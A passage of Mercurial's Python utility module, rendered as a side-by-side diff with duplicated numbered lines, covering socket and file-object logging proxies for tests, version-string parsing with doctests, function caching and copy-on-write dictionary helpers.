
584

return res

584

return res

585

586

def readline(self, *args, **kwargs):

586

def readline(self, *args, **kwargs):

587

res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)

587

res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)

588

589

fn = getattr(self._input._observer, r'bufferedreadline', None)

589

fn = getattr(self._input._observer, r'bufferedreadline', None)

590

if fn:

590

if fn:

591

fn(res)

591

fn(res)

592

593

return res

593

return res

594

595

PROXIED_SOCKET_METHODS = {

595

PROXIED_SOCKET_METHODS = {

596

r'makefile',

596

r'makefile',

597

r'recv',

597

r'recv',

598

r'recvfrom',

598

r'recvfrom',

599

r'recvfrom_into',

599

r'recvfrom_into',

600

r'recv_into',

600

r'recv_into',

601

r'send',

601

r'send',

602

r'sendall',

602

r'sendall',

603

r'sendto',

603

r'sendto',

604

r'setblocking',

604

r'setblocking',

605

r'settimeout',

605

r'settimeout',

606

r'gettimeout',

606

r'gettimeout',

607

r'setsockopt',

607

r'setsockopt',

608

}

608

}

609

610

class socketproxy(object):

610

class socketproxy(object):

611

"""A proxy around a socket that tells a watcher when events occur.

611

"""A proxy around a socket that tells a watcher when events occur.

612

613

This is like ``fileobjectproxy`` except for sockets.

613

This is like ``fileobjectproxy`` except for sockets.

614

615

This type is intended to only be used for testing purposes. Think hard

615

This type is intended to only be used for testing purposes. Think hard

616

before using it in important code.

616

before using it in important code.

617

"""

617

"""

618

__slots__ = (

618

__slots__ = (

619

r'_orig',

619

r'_orig',

620

r'_observer',

620

r'_observer',

621

)

621

)

622

623

def __init__(self, sock, observer):

623

def __init__(self, sock, observer):

624

object.__setattr__(self, r'_orig', sock)

624

object.__setattr__(self, r'_orig', sock)

625

object.__setattr__(self, r'_observer', observer)

625

object.__setattr__(self, r'_observer', observer)

626

627

def __getattribute__(self, name):

627

def __getattribute__(self, name):

628

if name in PROXIED_SOCKET_METHODS:

628

if name in PROXIED_SOCKET_METHODS:

629

return object.__getattribute__(self, name)

629

return object.__getattribute__(self, name)

630

631

return getattr(object.__getattribute__(self, r'_orig'), name)

631

return getattr(object.__getattribute__(self, r'_orig'), name)

632

633

def __delattr__(self, name):

633

def __delattr__(self, name):

634

return delattr(object.__getattribute__(self, r'_orig'), name)

634

return delattr(object.__getattribute__(self, r'_orig'), name)

635

636

def __setattr__(self, name, value):

636

def __setattr__(self, name, value):

637

return setattr(object.__getattribute__(self, r'_orig'), name, value)

637

return setattr(object.__getattribute__(self, r'_orig'), name, value)

638

639

def __nonzero__(self):

639

def __nonzero__(self):

640

return bool(object.__getattribute__(self, r'_orig'))

640

return bool(object.__getattribute__(self, r'_orig'))

641

642

__bool__ = __nonzero__

642

__bool__ = __nonzero__

643

644

def _observedcall(self, name, *args, **kwargs):

644

def _observedcall(self, name, *args, **kwargs):

645

# Call the original object.

645

# Call the original object.

646

orig = object.__getattribute__(self, r'_orig')

646

orig = object.__getattribute__(self, r'_orig')

647

res = getattr(orig, name)(*args, **kwargs)

647

res = getattr(orig, name)(*args, **kwargs)

648

649

# Call a method on the observer of the same name with arguments

649

# Call a method on the observer of the same name with arguments

650

# so it can react, log, etc.

650

# so it can react, log, etc.

651

observer = object.__getattribute__(self, r'_observer')

651

observer = object.__getattribute__(self, r'_observer')

652

fn = getattr(observer, name, None)

652

fn = getattr(observer, name, None)

653

if fn:

653

if fn:

654

fn(res, *args, **kwargs)

654

fn(res, *args, **kwargs)

655

656

return res

656

return res

657

658

def makefile(self, *args, **kwargs):

658

def makefile(self, *args, **kwargs):

659

res = object.__getattribute__(self, r'_observedcall')(

659

res = object.__getattribute__(self, r'_observedcall')(

660

r'makefile', *args, **kwargs)

660

r'makefile', *args, **kwargs)

661

662

# The file object may be used for I/O. So we turn it into a

662

# The file object may be used for I/O. So we turn it into a

663

# proxy using our observer.

663

# proxy using our observer.

664

observer = object.__getattribute__(self, r'_observer')

664

observer = object.__getattribute__(self, r'_observer')

665

return makeloggingfileobject(observer.fh, res, observer.name,

665

return makeloggingfileobject(observer.fh, res, observer.name,

666

reads=observer.reads,

666

reads=observer.reads,

667

writes=observer.writes,

667

writes=observer.writes,

668

logdata=observer.logdata,

668

logdata=observer.logdata,

669

logdataapis=observer.logdataapis)

669

logdataapis=observer.logdataapis)

670

671

def recv(self, *args, **kwargs):

671

def recv(self, *args, **kwargs):

672

return object.__getattribute__(self, r'_observedcall')(

672

return object.__getattribute__(self, r'_observedcall')(

673

r'recv', *args, **kwargs)

673

r'recv', *args, **kwargs)

674

675

def recvfrom(self, *args, **kwargs):

675

def recvfrom(self, *args, **kwargs):

676

return object.__getattribute__(self, r'_observedcall')(

676

return object.__getattribute__(self, r'_observedcall')(

677

r'recvfrom', *args, **kwargs)

677

r'recvfrom', *args, **kwargs)

678

679

def recvfrom_into(self, *args, **kwargs):

679

def recvfrom_into(self, *args, **kwargs):

680

return object.__getattribute__(self, r'_observedcall')(

680

return object.__getattribute__(self, r'_observedcall')(

681

r'recvfrom_into', *args, **kwargs)

681

r'recvfrom_into', *args, **kwargs)

682

683

def recv_into(self, *args, **kwargs):

683

def recv_into(self, *args, **kwargs):

684

return object.__getattribute__(self, r'_observedcall')(

684

return object.__getattribute__(self, r'_observedcall')(

685

r'recv_info', *args, **kwargs)

685

r'recv_info', *args, **kwargs)

686

687

def send(self, *args, **kwargs):

687

def send(self, *args, **kwargs):

688

return object.__getattribute__(self, r'_observedcall')(

688

return object.__getattribute__(self, r'_observedcall')(

689

r'send', *args, **kwargs)

689

r'send', *args, **kwargs)

690

691

def sendall(self, *args, **kwargs):

691

def sendall(self, *args, **kwargs):

692

return object.__getattribute__(self, r'_observedcall')(

692

return object.__getattribute__(self, r'_observedcall')(

693

r'sendall', *args, **kwargs)

693

r'sendall', *args, **kwargs)

694

695

def sendto(self, *args, **kwargs):

695

def sendto(self, *args, **kwargs):

696

return object.__getattribute__(self, r'_observedcall')(

696

return object.__getattribute__(self, r'_observedcall')(

697

r'sendto', *args, **kwargs)

697

r'sendto', *args, **kwargs)

698

699

def setblocking(self, *args, **kwargs):

699

def setblocking(self, *args, **kwargs):

700

return object.__getattribute__(self, r'_observedcall')(

700

return object.__getattribute__(self, r'_observedcall')(

701

r'setblocking', *args, **kwargs)

701

r'setblocking', *args, **kwargs)

702

703

def settimeout(self, *args, **kwargs):

703

def settimeout(self, *args, **kwargs):

704

return object.__getattribute__(self, r'_observedcall')(

704

return object.__getattribute__(self, r'_observedcall')(

705

r'settimeout', *args, **kwargs)

705

r'settimeout', *args, **kwargs)

706

707

def gettimeout(self, *args, **kwargs):

707

def gettimeout(self, *args, **kwargs):

708

return object.__getattribute__(self, r'_observedcall')(

708

return object.__getattribute__(self, r'_observedcall')(

709

r'gettimeout', *args, **kwargs)

709

r'gettimeout', *args, **kwargs)

710

711

def setsockopt(self, *args, **kwargs):

711

def setsockopt(self, *args, **kwargs):

712

return object.__getattribute__(self, r'_observedcall')(

712

return object.__getattribute__(self, r'_observedcall')(

713

r'setsockopt', *args, **kwargs)

713

r'setsockopt', *args, **kwargs)

714

715

class baseproxyobserver(object):

715

class baseproxyobserver(object):

716

def _writedata(self, data):

716

def _writedata(self, data):

717

if not self.logdata:

717

if not self.logdata:

718

if self.logdataapis:

718

if self.logdataapis:

719

self.fh.write('\n')

719

self.fh.write('\n')

720

self.fh.flush()

720

self.fh.flush()

721

return

721

return

722

723

# Simple case writes all data on a single line.

723

# Simple case writes all data on a single line.

724

if b'\n' not in data:

724

if b'\n' not in data:

725

if self.logdataapis:

725

if self.logdataapis:

726

self.fh.write(': %s\n' % stringutil.escapestr(data))

726

self.fh.write(': %s\n' % stringutil.escapestr(data))

727

else:

727

else:

728

self.fh.write('%s> %s\n'

728

self.fh.write('%s> %s\n'

729

% (self.name, stringutil.escapestr(data)))

729

% (self.name, stringutil.escapestr(data)))

730

self.fh.flush()

730

self.fh.flush()

731

return

731

return

732

733

# Data with newlines is written to multiple lines.

733

# Data with newlines is written to multiple lines.

734

if self.logdataapis:

734

if self.logdataapis:

735

self.fh.write(':\n')

735

self.fh.write(':\n')

736

737

lines = data.splitlines(True)

737

lines = data.splitlines(True)

738

for line in lines:

738

for line in lines:

739

self.fh.write('%s> %s\n'

739

self.fh.write('%s> %s\n'

740

% (self.name, stringutil.escapestr(line)))

740

% (self.name, stringutil.escapestr(line)))

741

self.fh.flush()

741

self.fh.flush()

742

743

class fileobjectobserver(baseproxyobserver):

743

class fileobjectobserver(baseproxyobserver):

744

"""Logs file object activity."""

744

"""Logs file object activity."""

745

def __init__(self, fh, name, reads=True, writes=True, logdata=False,

745

def __init__(self, fh, name, reads=True, writes=True, logdata=False,

746

logdataapis=True):

746

logdataapis=True):

747

self.fh = fh

747

self.fh = fh

748

self.name = name

748

self.name = name

749

self.logdata = logdata

749

self.logdata = logdata

750

self.logdataapis = logdataapis

750

self.logdataapis = logdataapis

751

self.reads = reads

751

self.reads = reads

752

self.writes = writes

752

self.writes = writes

753

754

def read(self, res, size=-1):

754

def read(self, res, size=-1):

755

if not self.reads:

755

if not self.reads:

756

return

756

return

757

# Python 3 can return None from reads at EOF instead of empty strings.

757

# Python 3 can return None from reads at EOF instead of empty strings.

758

if res is None:

758

if res is None:

759

res = ''

759

res = ''

760

761

if size == -1 and res == '':

761

if size == -1 and res == '':

762

# Suppress pointless read(-1) calls that return

762

# Suppress pointless read(-1) calls that return

763

# nothing. These happen _a lot_ on Python 3, and there

763

# nothing. These happen _a lot_ on Python 3, and there

764

# doesn't seem to be a better workaround to have matching

764

# doesn't seem to be a better workaround to have matching

765

# Python 2 and 3 behavior. :(

765

# Python 2 and 3 behavior. :(

766

return

766

return

767

768

if self.logdataapis:

768

if self.logdataapis:

769

self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))

769

self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))

770

771

self._writedata(res)

771

self._writedata(res)

772

773

def readline(self, res, limit=-1):

773

def readline(self, res, limit=-1):

774

if not self.reads:

774

if not self.reads:

775

return

775

return

776

777

if self.logdataapis:

777

if self.logdataapis:

778

self.fh.write('%s> readline() -> %d' % (self.name, len(res)))

778

self.fh.write('%s> readline() -> %d' % (self.name, len(res)))

779

780

self._writedata(res)

780

self._writedata(res)

781

782

def readinto(self, res, dest):

782

def readinto(self, res, dest):

783

if not self.reads:

783

if not self.reads:

784

return

784

return

785

786

if self.logdataapis:

786

if self.logdataapis:

787

self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),

787

self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),

788

res))

788

res))

789

790

data = dest[0:res] if res is not None else b''

790

data = dest[0:res] if res is not None else b''

791

self._writedata(data)

791

self._writedata(data)

792

793

def write(self, res, data):

793

def write(self, res, data):

794

if not self.writes:

794

if not self.writes:

795

return

795

return

796

797

# Python 2 returns None from some write() calls. Python 3 (reasonably)

797

# Python 2 returns None from some write() calls. Python 3 (reasonably)

798

# returns the integer bytes written.

798

# returns the integer bytes written.

799

if res is None and data:

799

if res is None and data:

800

res = len(data)

800

res = len(data)

801

802

if self.logdataapis:

802

if self.logdataapis:

803

self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))

803

self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))

804

805

self._writedata(data)

805

self._writedata(data)

806

807

def flush(self, res):

807

def flush(self, res):

808

if not self.writes:

808

if not self.writes:

809

return

809

return

810

811

self.fh.write('%s> flush() -> %r\n' % (self.name, res))

811

self.fh.write('%s> flush() -> %r\n' % (self.name, res))

812

813

# For observedbufferedinputpipe.

813

# For observedbufferedinputpipe.

814

def bufferedread(self, res, size):

814

def bufferedread(self, res, size):

815

if not self.reads:

815

if not self.reads:

816

return

816

return

817

818

if self.logdataapis:

818

if self.logdataapis:

819

self.fh.write('%s> bufferedread(%d) -> %d' % (

819

self.fh.write('%s> bufferedread(%d) -> %d' % (

820

self.name, size, len(res)))

820

self.name, size, len(res)))

821

822

self._writedata(res)

822

self._writedata(res)

823

824

def bufferedreadline(self, res):

824

def bufferedreadline(self, res):

825

if not self.reads:

825

if not self.reads:

826

return

826

return

827

828

if self.logdataapis:

828

if self.logdataapis:

829

self.fh.write('%s> bufferedreadline() -> %d' % (

829

self.fh.write('%s> bufferedreadline() -> %d' % (

830

self.name, len(res)))

830

self.name, len(res)))

831

832

self._writedata(res)

832

self._writedata(res)

833

834

def makeloggingfileobject(logh, fh, name, reads=True, writes=True,

834

def makeloggingfileobject(logh, fh, name, reads=True, writes=True,

835

logdata=False, logdataapis=True):

835

logdata=False, logdataapis=True):

836

"""Turn a file object into a logging file object."""

836

"""Turn a file object into a logging file object."""

837

838

observer = fileobjectobserver(logh, name, reads=reads, writes=writes,

838

observer = fileobjectobserver(logh, name, reads=reads, writes=writes,

839

logdata=logdata, logdataapis=logdataapis)

839

logdata=logdata, logdataapis=logdataapis)

840

return fileobjectproxy(fh, observer)

840

return fileobjectproxy(fh, observer)

841

842

class socketobserver(baseproxyobserver):

842

class socketobserver(baseproxyobserver):

843

"""Logs socket activity."""

843

"""Logs socket activity."""

844

def __init__(self, fh, name, reads=True, writes=True, states=True,

844

def __init__(self, fh, name, reads=True, writes=True, states=True,

845

logdata=False, logdataapis=True):

845

logdata=False, logdataapis=True):

846

self.fh = fh

846

self.fh = fh

847

self.name = name

847

self.name = name

848

self.reads = reads

848

self.reads = reads

849

self.writes = writes

849

self.writes = writes

850

self.states = states

850

self.states = states

851

self.logdata = logdata

851

self.logdata = logdata

852

self.logdataapis = logdataapis

852

self.logdataapis = logdataapis

853

854

def makefile(self, res, mode=None, bufsize=None):

854

def makefile(self, res, mode=None, bufsize=None):

855

if not self.states:

855

if not self.states:

856

return

856

return

857

858

self.fh.write('%s> makefile(%r, %r)\n' % (

858

self.fh.write('%s> makefile(%r, %r)\n' % (

859

self.name, mode, bufsize))

859

self.name, mode, bufsize))

860

861

def recv(self, res, size, flags=0):

861

def recv(self, res, size, flags=0):

862

if not self.reads:

862

if not self.reads:

863

return

863

return

864

865

if self.logdataapis:

865

if self.logdataapis:

866

self.fh.write('%s> recv(%d, %d) -> %d' % (

866

self.fh.write('%s> recv(%d, %d) -> %d' % (

867

self.name, size, flags, len(res)))

867

self.name, size, flags, len(res)))

868

self._writedata(res)

868

self._writedata(res)

869

870

def recvfrom(self, res, size, flags=0):

870

def recvfrom(self, res, size, flags=0):

871

if not self.reads:

871

if not self.reads:

872

return

872

return

873

874

if self.logdataapis:

874

if self.logdataapis:

875

self.fh.write('%s> recvfrom(%d, %d) -> %d' % (

875

self.fh.write('%s> recvfrom(%d, %d) -> %d' % (

876

self.name, size, flags, len(res[0])))

876

self.name, size, flags, len(res[0])))

877

878

self._writedata(res[0])

878

self._writedata(res[0])

879

880

def recvfrom_into(self, res, buf, size, flags=0):

880

def recvfrom_into(self, res, buf, size, flags=0):

881

if not self.reads:

881

if not self.reads:

882

return

882

return

883

884

if self.logdataapis:

884

if self.logdataapis:

885

self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (

885

self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (

886

self.name, size, flags, res[0]))

886

self.name, size, flags, res[0]))

887

888

self._writedata(buf[0:res[0]])

888

self._writedata(buf[0:res[0]])

889

890

def recv_into(self, res, buf, size=0, flags=0):

890

def recv_into(self, res, buf, size=0, flags=0):

891

if not self.reads:

891

if not self.reads:

892

return

892

return

893

894

if self.logdataapis:

894

if self.logdataapis:

895

self.fh.write('%s> recv_into(%d, %d) -> %d' % (

895

self.fh.write('%s> recv_into(%d, %d) -> %d' % (

896

self.name, size, flags, res))

896

self.name, size, flags, res))

897

898

self._writedata(buf[0:res])

898

self._writedata(buf[0:res])

899

900

def send(self, res, data, flags=0):

900

def send(self, res, data, flags=0):

901

if not self.writes:

901

if not self.writes:

902

return

902

return

903

904

self.fh.write('%s> send(%d, %d) -> %d' % (

904

self.fh.write('%s> send(%d, %d) -> %d' % (

905

self.name, len(data), flags, len(res)))

905

self.name, len(data), flags, len(res)))

906

self._writedata(data)

906

self._writedata(data)

907

908

def sendall(self, res, data, flags=0):

908

def sendall(self, res, data, flags=0):

909

if not self.writes:

909

if not self.writes:

910

return

910

return

911

912

if self.logdataapis:

912

if self.logdataapis:

913

# Returns None on success. So don't bother reporting return value.

913

# Returns None on success. So don't bother reporting return value.

914

self.fh.write('%s> sendall(%d, %d)' % (

914

self.fh.write('%s> sendall(%d, %d)' % (

915

self.name, len(data), flags))

915

self.name, len(data), flags))

916

917

self._writedata(data)

917

self._writedata(data)

918

919

def sendto(self, res, data, flagsoraddress, address=None):

919

def sendto(self, res, data, flagsoraddress, address=None):

920

if not self.writes:

920

if not self.writes:

921

return

921

return

922

923

if address:

923

if address:

924

flags = flagsoraddress

924

flags = flagsoraddress

925

else:

925

else:

926

flags = 0

926

flags = 0

927

928

if self.logdataapis:

928

if self.logdataapis:

929

self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (

929

self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (

930

self.name, len(data), flags, address, res))

930

self.name, len(data), flags, address, res))

931

932

self._writedata(data)

932

self._writedata(data)

933

934

def setblocking(self, res, flag):

934

def setblocking(self, res, flag):

935

if not self.states:

935

if not self.states:

936

return

936

return

937

938

self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))

938

self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))

939

940

def settimeout(self, res, value):

940

def settimeout(self, res, value):

941

if not self.states:

941

if not self.states:

942

return

942

return

943

944

self.fh.write('%s> settimeout(%r)\n' % (self.name, value))

944

self.fh.write('%s> settimeout(%r)\n' % (self.name, value))

945

946

def gettimeout(self, res):

946

def gettimeout(self, res):

947

if not self.states:

947

if not self.states:

948

return

948

return

949

950

self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))

950

self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))

951

952

def setsockopt(self, res, level, optname, value):

952

def setsockopt(self, res, level, optname, value):

953

if not self.states:

953

if not self.states:

954

return

954

return

955

956

self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (

956

self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (

957

self.name, level, optname, value, res))

957

self.name, level, optname, value, res))

958

959

def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,

959

def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,

960

logdata=False, logdataapis=True):

960

logdata=False, logdataapis=True):

961

"""Turn a socket into a logging socket."""

961

"""Turn a socket into a logging socket."""

962

963

observer = socketobserver(logh, name, reads=reads, writes=writes,

963

observer = socketobserver(logh, name, reads=reads, writes=writes,

964

states=states, logdata=logdata,

964

states=states, logdata=logdata,

965

logdataapis=logdataapis)

965

logdataapis=logdataapis)

966

return socketproxy(fh, observer)

966

return socketproxy(fh, observer)

967

968

def version():

968

def version():

969

"""Return version information if available."""

969

"""Return version information if available."""

970

try:

970

try:

971

from . import __version__

971

from . import __version__

972

return __version__.version

972

return __version__.version

973

except ImportError:

973

except ImportError:

974

return 'unknown'

974

return 'unknown'

975

976

def versiontuple(v=None, n=4):

976

def versiontuple(v=None, n=4):

977

"""Parses a Mercurial version string into an N-tuple.

977

"""Parses a Mercurial version string into an N-tuple.

978

979

The version string to be parsed is specified with the ``v`` argument.

979

The version string to be parsed is specified with the ``v`` argument.

980

If it isn't defined, the current Mercurial version string will be parsed.

980

If it isn't defined, the current Mercurial version string will be parsed.

981

982

``n`` can be 2, 3, or 4. Here is how some version strings map to

982

``n`` can be 2, 3, or 4. Here is how some version strings map to

983

returned values:

983

returned values:

984

985

>>> v = b'3.6.1+190-df9b73d2d444'

985

>>> v = b'3.6.1+190-df9b73d2d444'

986

>>> versiontuple(v, 2)

986

>>> versiontuple(v, 2)

987

(3, 6)

987

(3, 6)

988

>>> versiontuple(v, 3)

988

>>> versiontuple(v, 3)

989

(3, 6, 1)

989

(3, 6, 1)

990

>>> versiontuple(v, 4)

990

>>> versiontuple(v, 4)

991

(3, 6, 1, '190-df9b73d2d444')

991

(3, 6, 1, '190-df9b73d2d444')

992

993

>>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')

993

>>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')

994

(3, 6, 1, '190-df9b73d2d444+20151118')

994

(3, 6, 1, '190-df9b73d2d444+20151118')

995

996

>>> v = b'3.6'

996

>>> v = b'3.6'

997

>>> versiontuple(v, 2)

997

>>> versiontuple(v, 2)

998

(3, 6)

998

(3, 6)

999

>>> versiontuple(v, 3)

999

>>> versiontuple(v, 3)

1000

(3, 6, None)

1000

(3, 6, None)

1001

>>> versiontuple(v, 4)

1001

>>> versiontuple(v, 4)

1002

(3, 6, None, None)

1002

(3, 6, None, None)

1003

1004

>>> v = b'3.9-rc'

1004

>>> v = b'3.9-rc'

1005

>>> versiontuple(v, 2)

1005

>>> versiontuple(v, 2)

1006

(3, 9)

1006

(3, 9)

1007

>>> versiontuple(v, 3)

1007

>>> versiontuple(v, 3)

1008

(3, 9, None)

1008

(3, 9, None)

1009

>>> versiontuple(v, 4)

1009

>>> versiontuple(v, 4)

1010

(3, 9, None, 'rc')

1010

(3, 9, None, 'rc')

1011

1012

>>> v = b'3.9-rc+2-02a8fea4289b'

1012

>>> v = b'3.9-rc+2-02a8fea4289b'

1013

>>> versiontuple(v, 2)

1013

>>> versiontuple(v, 2)

1014

(3, 9)

1014

(3, 9)

1015

>>> versiontuple(v, 3)

1015

>>> versiontuple(v, 3)

1016

(3, 9, None)

1016

(3, 9, None)

1017

>>> versiontuple(v, 4)

1017

>>> versiontuple(v, 4)

1018

(3, 9, None, 'rc+2-02a8fea4289b')

1018

(3, 9, None, 'rc+2-02a8fea4289b')

1019

1020

>>> versiontuple(b'4.6rc0')

1020

>>> versiontuple(b'4.6rc0')

1021

(4, 6, None, 'rc0')

1021

(4, 6, None, 'rc0')

1022

>>> versiontuple(b'4.6rc0+12-425d55e54f98')

1022

>>> versiontuple(b'4.6rc0+12-425d55e54f98')

1023

(4, 6, None, 'rc0+12-425d55e54f98')

1023

(4, 6, None, 'rc0+12-425d55e54f98')

1024

>>> versiontuple(b'.1.2.3')

1024

>>> versiontuple(b'.1.2.3')

1025

(None, None, None, '.1.2.3')

1025

(None, None, None, '.1.2.3')

1026

>>> versiontuple(b'12.34..5')

1026

>>> versiontuple(b'12.34..5')

1027

(12, 34, None, '..5')

1027

(12, 34, None, '..5')

1028

>>> versiontuple(b'1.2.3.4.5.6')

1028

>>> versiontuple(b'1.2.3.4.5.6')

1029

(1, 2, 3, '.4.5.6')

1029

(1, 2, 3, '.4.5.6')

1030

"""

1030

"""

1031

if not v:

1031

if not v:

1032

v = version()

1032

v = version()

1033

m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)

1033

m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)

1034

if not m:

1034

if not m:

1035

vparts, extra = '', v

1035

vparts, extra = '', v

1036

elif m.group(2):

1036

elif m.group(2):

1037

vparts, extra = m.groups()

1037

vparts, extra = m.groups()

1038

else:

1038

else:

1039

vparts, extra = m.group(1), None

1039

vparts, extra = m.group(1), None

1040

1041

vints = []

1041

vints = []

1042

for i in vparts.split('.'):

1042

for i in vparts.split('.'):

1043

try:

1043

try:

1044

vints.append(int(i))

1044

vints.append(int(i))

1045

except ValueError:

1045

except ValueError:

1046

break

1046

break

1047

# (3, 6) -> (3, 6, None)

1047

# (3, 6) -> (3, 6, None)

1048

while len(vints) < 3:

1048

while len(vints) < 3:

1049

vints.append(None)

1049

vints.append(None)

1050

1051

if n == 2:

1051

if n == 2:

1052

return (vints[0], vints[1])

1052

return (vints[0], vints[1])

1053

if n == 3:

1053

if n == 3:

1054

return (vints[0], vints[1], vints[2])

1054

return (vints[0], vints[1], vints[2])

1055

if n == 4:

1055

if n == 4:

1056

return (vints[0], vints[1], vints[2], extra)

1056

return (vints[0], vints[1], vints[2], extra)

1057

1058

def cachefunc(func):

1058

def cachefunc(func):

1059

'''cache the result of function calls'''

1059

'''cache the result of function calls'''

1060

# XXX doesn't handle keywords args

1060

# XXX doesn't handle keywords args

1061

if func.__code__.co_argcount == 0:

1061

if func.__code__.co_argcount == 0:

1062

cache = []

1062

cache = []

1063

def f():

1063

def f():

1064

if len(cache) == 0:

1064

if len(cache) == 0:

1065

cache.append(func())

1065

cache.append(func())

1066

return cache[0]

1066

return cache[0]

1067

return f

1067

return f

1068

cache = {}

1068

cache = {}

1069

if func.__code__.co_argcount == 1:

1069

if func.__code__.co_argcount == 1:

1070

# we gain a small amount of time because

1070

# we gain a small amount of time because

1071

# we don't need to pack/unpack the list

1071

# we don't need to pack/unpack the list

1072

def f(arg):

1072

def f(arg):

1073

if arg not in cache:

1073

if arg not in cache:

1074

cache[arg] = func(arg)

1074

cache[arg] = func(arg)

1075

return cache[arg]

1075

return cache[arg]

1076

else:

1076

else:

1077

def f(*args):

1077

def f(*args):

1078

if args not in cache:

1078

if args not in cache:

1079

cache[args] = func(*args)

1079

cache[args] = func(*args)

1080

return cache[args]

1080

return cache[args]

1081

1082

return f

1082

return f

1083

1084

class cow(object):

1084

class cow(object):

1085

"""helper class to make copy-on-write easier

1085

"""helper class to make copy-on-write easier

1086

1087

Call preparewrite before doing any writes.

1087

Call preparewrite before doing any writes.

1088

"""

1088

"""

1089

1090

def preparewrite(self):

1090

def preparewrite(self):

1091

"""call this before writes, return self or a copied new object"""

1091

"""call this before writes, return self or a copied new object"""

1092

if getattr(self, '_copied', 0):

1092

if getattr(self, '_copied', 0):

1093

self._copied -= 1

1093

self._copied -= 1

1094

return self.__class__(self)

1094

return self.__class__(self)

1095

return self

1095

return self

1096

1097

def copy(self):

1097

def copy(self):

1098

"""always do a cheap copy"""

1098

"""always do a cheap copy"""

1099

self._copied = getattr(self, '_copied', 0) + 1

1099

self._copied = getattr(self, '_copied', 0) + 1

1100

return self

1100

return self

1101

1102

class sortdict(collections.OrderedDict):

1102

class sortdict(collections.OrderedDict):

1103

'''a simple sorted dictionary

1103

'''a simple sorted dictionary

1104

1105

>>> d1 = sortdict([(b'a', 0), (b'b', 1)])

1105

>>> d1 = sortdict([(b'a', 0), (b'b', 1)])

1106

>>> d2 = d1.copy()

1106

>>> d2 = d1.copy()

1107

>>> d2

1107

>>> d2

1108

sortdict([('a', 0), ('b', 1)])

1108

sortdict([('a', 0), ('b', 1)])

1109

>>> d2.update([(b'a', 2)])

1109

>>> d2.update([(b'a', 2)])

1110

>>> list(d2.keys()) # should still be in last-set order

1110

>>> list(d2.keys()) # should still be in last-set order

1111

['b', 'a']

1111

['b', 'a']

1112

'''

1112

'''

1113

1114

def __setitem__(self, key, value):

1114

def __setitem__(self, key, value):

1115

if key in self:

1115

if key in self:

1116

del self[key]

1116

del self[key]

1117

super(sortdict, self).__setitem__(key, value)

1117

super(sortdict, self).__setitem__(key, value)

1118

1119

if pycompat.ispypy:

1119

if pycompat.ispypy:

1120

# __setitem__() isn't called as of PyPy 5.8.0

1120

# __setitem__() isn't called as of PyPy 5.8.0

1121

def update(self, src):

1121

def update(self, src):

1122

if isinstance(src, dict):

1122

if isinstance(src, dict):

1123

src = src.iteritems()

1123

src = src.iteritems()

1124

for k, v in src:

1124

for k, v in src:

1125

self[k] = v

1125

self[k] = v

1126

1127

class cowdict(cow, dict):

1127

class cowdict(cow, dict):

1128

"""copy-on-write dict

1128

"""copy-on-write dict

1129

1130

Be sure to call d = d.preparewrite() before writing to d.

1130

Be sure to call d = d.preparewrite() before writing to d.

1131

1132

>>> a = cowdict()

1132

>>> a = cowdict()

1133

>>> a is a.preparewrite()

1133

>>> a is a.preparewrite()

1134

True

1134

True

1135

>>> b = a.copy()

1135

>>> b = a.copy()

1136

>>> b is a

1136

>>> b is a

1137

True

1137

True

1138

>>> c = b.copy()

1138

>>> c = b.copy()

1139

>>> c is a

1139

>>> c is a

1140

True

1140

True

1141

>>> a = a.preparewrite()

1141

>>> a = a.preparewrite()

1142

>>> b is a

1142

>>> b is a

1143

False

1143

False

1144

>>> a is a.preparewrite()

1144

>>> a is a.preparewrite()

1145

True

1145

True

1146

>>> c = c.preparewrite()

1146

>>> c = c.preparewrite()

1147

>>> b is c

1147

>>> b is c

1148

False

1148

False

1149

>>> b is b.preparewrite()

1149

>>> b is b.preparewrite()

1150

True

1150

True

1151

"""

1151

"""

1152

1153

class cowsortdict(cow, sortdict):

1153

class cowsortdict(cow, sortdict):

1154

"""copy-on-write sortdict

1154

"""copy-on-write sortdict

1155

1156

Be sure to call d = d.preparewrite() before writing to d.

1156

Be sure to call d = d.preparewrite() before writing to d.

1157

"""

1157

"""

1158

1159

class transactional(object):

1159

class transactional(object):

1160

"""Base class for making a transactional type into a context manager."""

1160

"""Base class for making a transactional type into a context manager."""

1161

__metaclass__ = abc.ABCMeta

1161

__metaclass__ = abc.ABCMeta

1162

1163

@abc.abstractmethod

1163

@abc.abstractmethod

1164

def close(self):

1164

def close(self):

1165

"""Successfully closes the transaction."""

1165

"""Successfully closes the transaction."""

1166

1167

@abc.abstractmethod

1167

@abc.abstractmethod

1168

def release(self):

1168

def release(self):

1169

"""Marks the end of the transaction.

1169

"""Marks the end of the transaction.

1170

1171

If the transaction has not been closed, it will be aborted.

1171

If the transaction has not been closed, it will be aborted.

1172

"""

1172

"""

1173

1174

def __enter__(self):

1174

def __enter__(self):

1175

return self

1175

return self

1176

1177

def __exit__(self, exc_type, exc_val, exc_tb):

1177

def __exit__(self, exc_type, exc_val, exc_tb):

1178

try:

1178

try:

1179

if exc_type is None:

1179

if exc_type is None:

1180

self.close()

1180

self.close()

1181

finally:

1181

finally:

1182

self.release()

1182

self.release()

1183

1184

@contextlib.contextmanager

1184

@contextlib.contextmanager

1185

def acceptintervention(tr=None):

1185
